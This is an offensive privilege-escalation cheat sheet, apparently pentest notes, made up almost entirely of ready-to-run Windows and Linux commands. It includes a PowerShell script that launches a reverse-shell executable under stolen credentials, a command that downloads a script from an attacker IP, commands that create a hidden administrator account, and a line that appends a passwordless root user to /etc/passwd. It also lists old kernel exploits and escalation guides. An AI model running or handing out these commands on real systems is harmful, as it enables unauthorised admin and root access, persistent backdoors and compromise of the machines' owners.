systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
net user
{% code title="run.ps1" %}
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice",
$secpasswd)
$computer = "BETHANY"
[System.Diagnostics.Process]::Start("C:\Windows\temp\reverse.exe","<argument>",
$mycreds.Username, $mycreds.Password, $computer)
{% endcode %}
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.98/run.ps1','C:\Users\Bethany\run.ps1')"
net user <username> <password> /add
net localgroup Administrators <username> /add
start RDP
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic os get osarchitecture
- KiTrap0D (KB979682)
- MS11-011 (KB2393802)
- MS10-059 (KB982799)
- MS10-021 (KB979683)
- MS11-080 (KB2592799)
echo 'dummy::0:0::/root:/bin/bash' >> /etc/passwd
python -c 'import pty; pty.spawn("/bin/bash")'
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
- http://www.fuzzysecurity.com/tutorials/16.html
- https://guif.re/windowseop
- https://github.com/infoskirmish/Window-Tools/tree/master/Simple%20Reverse%20Shell
- https://guide.offsecnewbie.com/privilege-escalation/windows-pe
- Kitrap0D